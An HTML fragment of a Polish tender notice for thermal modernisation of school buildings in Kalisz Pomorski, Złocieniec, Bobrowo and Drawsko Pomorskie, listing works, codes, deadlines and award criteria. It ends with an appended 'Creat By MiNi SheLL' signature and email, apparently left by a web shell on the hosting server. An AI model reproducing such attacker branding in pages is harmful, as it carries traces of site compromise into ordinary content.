<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3: Termomodernizacja:
a)Budynku Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim
b)Budynku Zespołu Szkół Ponadgimnazjalnych w Złocieńcu
c)Budynku Specjalnego Ośrodka Szkolno Wychowawczego w Bobrowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim

1.  Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14cm (budynek III - łącznik) oraz wykonanie dwukrotnej izolacji przeciwwilgociowej papą termozgrzewalną dachu.
2.Ocieplenie stropu pod nieogrzewanym poddaszem w części budynku dydaktycznego nr 1 warstwą wełny mineralnej w płytach grubości 17 cm, wykonanie komunikacji poddasza za pomocą pomostów drewnianych wg dokumentacji projektowej, dodatkowo należy ocieplić ścianę między klatką schodową a poddaszem nieużytkowym styropianem gr. 14 cm
3. Ocieplenie ścian zewnętrznych grubości 38 cm łącznika warstwą styropianu o grubości 14 cm wraz z warstwą wykończeniową elewacyjną  w postaci tynku cienkowarstwowego  akrylowego.
4. Wymiana części istniejącej stolarki okiennej na stolarkę z tworzyw sztucznych z  zastosowaniem nawiewników automatycznych montażem nowych parapetów.
5. Czyszczenie chemiczne i regulacja hydrauliczna istniejącej instalacji c.o. 

Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych w Złocieńcu

1. Ocieplenie stropodachu pełnego warstwą granulowanej wełny mineralnej grubości 14 cm w nowej części szkoły.
2. Ocieplenie stropu pod nieogrzewanym poddaszem w części starej grubości 15 cm warstwą wełny mineralnej w płytach ułożonych od strony poddasza
3. Ocieplenie stropu piwnic warstwą styropianu grubości 6 cm od spodu konstrukcji
4. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 13 cm
5. Wymiana stolarki okiennej i zewnętrznej drzwiowej jak w projekcie budowlanym z zastosowaniem nowej stolarki energooszczędnej z nawiewnikami.
6. Modernizacja wewnętrznej instalacji centralnego ogrzewania polegająca na wymianie istniejących grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami miedzianymi - dotyczy części wschodniej i południowej

Zakres dla budynku Specjalnego Ośrodka Szkolno Wychowawczego w Bobrowie

1.   Wymiana stolarki okiennej i zewnętrznej drzwiowej jak w projekcie budowlanym z zastosowaniem nowej stolarki energooszczędnej z nawiewnikami.
2. Modernizacja wewnętrznej instalacji centralnego ogrzewania polegająca na wymianie istniejących grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami miedzianymi.
3. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na dwa kondensacyjne kotły gazowe o mocy 60 kW każdy z regulatorem pogodowym, sterującym obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej wody użytkowej. Zasilanie instalacji c.w.u. z dwóch zasobników o pojemności 300 litrów każdy.
4. Wykonanie izolacji ścian przyziemia przez odkopanie ścian od strony zewnętrznej do głębokości fundamentów, oczyszczenie ścian z ziemii i odpadającego tynku, osuszenie  ścian, wykonanie dwuwarstwowej pionowej izolacji emulsją asfaltową, wykonanie izolacji pionowej za pomocą folii kubełkowej, zasypanie ziemią, doprowadzenie nawierzchni do stanu jak przed rozpoczęciem prac. Od wewnątrz odbić zmurszałe tynki, osuszyć ściany, ponownie otynkować ściany.  Uwaga! Nie stosować osuszania  metodą iniekcji.

W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 3 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.23.10.00-4, 45.33.11.00-7, 45.42.10.00-4, 45.31.23.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4: Termomodernizacja
a)Budynku Zespołu Szkół Ponadgimnazjalnych nr 1 w Drawsku Pomorskim
b)Budynku Zespołu Szkół Ponadgimnazjalnych nr 2 w Drawsku Pomorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych nr 1 w Drawsku Pomorskim

1)Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 cm (nowa część szkoły)
2)Ocieplenie stropodachu pełnego sali sportowej warstwą styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3)Ocieplenie stropodachu budynku głównego warstwą styropianu grubości 14 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną
4)Ocieplenie ścian zewnętrznych gr 38 cm I i II piętra budynku dydaktycznego warstwą styropianu o grubości 14 cm
5)Ocieplenie ścian zewnętrznych parteru części dydaktycznej, łącznika oraz ściany tylnej sali sportowej warstwą styropianu o grubości 13 cm 
6)Wymiana części stolarki okiennej
7)Wymiana stolarki drzwiowej na aluminiową ciepłą
8)Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych dwupłytowych z zaworami termostatycznymi, rurociągami miedzianymi, automatyką pogodową

Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych nr 2 w Drawsku Pomorskim

1. Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 cm (szkoła i łącznik)
2. Ocieplenie stropodachu pełnego zaplecza sali gimnastycznej warstwą styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie ścian zewnętrznych gr 38 cm styropianem grubości 13 cm 
4. Ocieplenie stropodachu sali gimnastycznej warstwą styropianu grubości 13 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną
5. Wymiana drewnianej, zespolonej stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem nawiewników automatycznych.
6. Wymiana stolarki drzwiowej na aluminiową ciepłą
7. Modernizacja instalacji centralnego ogrzewania polegająca na płukaniu chemicznym, regulacji hydraulicznej instalacji, montażu zaworów termostatycznych. 
8. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na dwa  nowoczesne kotły gazowe o mocy łącznej 450 kW z regulatorem pogodowym, sterującym obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej wody użytkowej. Zasilanie instalacji c.w.u. z dwóch zasobników o pojemności 500 litrów każdy. 

W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 4 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
 Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.23.10.00-4, 45.33.11.00-7, 45.42.10.00-4, 45.31.23.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com